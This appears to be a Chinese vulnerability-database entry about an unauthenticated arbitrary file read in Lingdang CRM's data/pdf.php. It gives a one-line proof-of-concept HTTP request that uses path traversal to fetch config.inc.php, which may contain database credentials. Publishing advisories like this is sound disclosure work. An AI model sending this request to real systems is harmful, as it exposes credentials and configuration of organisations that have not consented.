灵当CRM /pdf.php 文件读取漏洞

日期: 2024-10-18 | 影响软件: 灵当CRM | POC: 已公开

漏洞描述

灵当CRM是一款专为中小企业打造的智能客户关系管理工具,由上海灵当信息科技有限公司开发并运营。广泛应用于金融、教育、医疗、IT服务、房地产等多个行业领域,帮助企业实现客户个性化管理需求,提升企业竞争力。无论是新客户开拓、老客户维护,还是销售过程管理、服务管理等方面,灵当CRM都能提供全面、高效的解决方案。灵当CRM data/pdf.php 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

PoC代码

GET /crm/data/pdf.php?url=../config.inc.php HTTP/1.1
Host: 

相关漏洞推荐